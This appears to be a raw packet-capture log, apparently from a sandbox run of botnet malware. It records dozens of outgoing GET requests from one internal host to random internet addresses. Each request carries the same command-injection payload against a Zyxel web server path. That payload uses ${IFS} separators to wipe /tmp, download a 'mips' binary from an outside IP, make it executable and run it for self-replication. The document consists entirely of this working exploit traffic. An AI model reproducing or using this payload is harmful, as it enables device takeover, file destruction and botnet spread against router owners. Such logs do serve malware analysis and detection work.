                              Mar 31, 2024 08:42:21.533504963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9551192.168.2.135710071.118.168.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533559084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9552192.168.2.1355810119.222.201.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533587933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9553192.168.2.133905627.226.152.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533644915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9554192.168.2.1352796141.222.12.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533696890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9555192.168.2.1357978147.223.205.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533735037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9556192.168.2.134044893.12.122.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533787012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9557192.168.2.1347074190.24.86.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533813000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9558192.168.2.1343270156.109.18.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533869028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9559192.168.2.136078012.109.73.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533896923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9560192.168.2.133913039.195.66.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533934116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9561192.168.2.135638097.199.127.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533956051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9562192.168.2.135558480.11.159.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533996105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9563192.168.2.1339200141.103.253.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534037113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9564192.168.2.1354164210.218.76.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534064054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9565192.168.2.135721636.152.166.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534126043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9566192.168.2.134068095.8.53.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534174919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9567192.168.2.1351216204.59.133.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534205914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9568192.168.2.1351630216.179.97.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534234047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9569192.168.2.135649487.167.171.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534296036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9570192.168.2.134874618.71.255.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534336090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9571192.168.2.1340332217.139.155.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534382105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9572192.168.2.1353986201.41.151.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534419060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9573192.168.2.1351872102.203.200.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534475088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9574192.168.2.135334644.108.173.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534518003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9575192.168.2.134226298.68.10.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534535885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9576192.168.2.1335846168.54.92.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534616947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9577192.168.2.1343300167.41.193.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534642935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9578192.168.2.1336698103.134.2.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534698963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9579192.168.2.1354754166.22.36.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534723043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9580192.168.2.1349466153.146.99.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534780025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9581192.168.2.135014214.188.236.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534823895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9582192.168.2.135832090.161.250.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534840107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9583192.168.2.1345062206.59.37.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534895897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9584192.168.2.1333284143.46.77.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534943104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9585192.168.2.134355277.251.231.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534974098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9586192.168.2.1344846178.48.161.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.534990072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9587192.168.2.1359900107.231.184.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535063982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9588192.168.2.133718495.66.189.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535095930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9589192.168.2.1341126133.187.186.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535135031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9590192.168.2.133400437.243.164.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535168886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9591192.168.2.1333490212.79.105.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535206079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9592192.168.2.1341378193.57.73.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535233974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9593192.168.2.1357068114.193.91.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535309076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9594192.168.2.134045098.172.233.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535346031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9595192.168.2.1351708144.5.40.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535386086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9596192.168.2.1336638172.249.134.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535444021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9597192.168.2.135777219.136.0.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535492897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9598192.168.2.1354208147.48.102.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535542965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9599192.168.2.1349298218.20.220.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535605907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9600192.168.2.135397823.14.4.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535670996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9601192.168.2.135121863.96.239.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535692930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9602192.168.2.1360386186.190.40.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535749912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9603192.168.2.1339354155.95.10.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535801888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9604192.168.2.135500468.149.200.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535850048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9605192.168.2.1358874138.114.245.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535876036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9606192.168.2.1335616185.175.220.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535948038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9607192.168.2.135144236.82.189.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.535975933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9608192.168.2.1357764172.233.60.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536010027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9609192.168.2.134076093.147.68.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536048889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9610192.168.2.1359684196.192.106.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536086082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9611192.168.2.1348078179.168.194.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536117077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9612192.168.2.134575818.234.106.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536165953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9613192.168.2.13464648.229.116.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536197901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9614192.168.2.135174859.206.199.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536237955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9615192.168.2.135468091.14.194.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536290884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9616192.168.2.1340138120.142.88.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536329031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9617192.168.2.1343996182.207.147.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536350965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9618192.168.2.135661841.97.20.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536420107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9619192.168.2.1336696208.153.138.191443
                              TimestampBytes transferredDirectionData
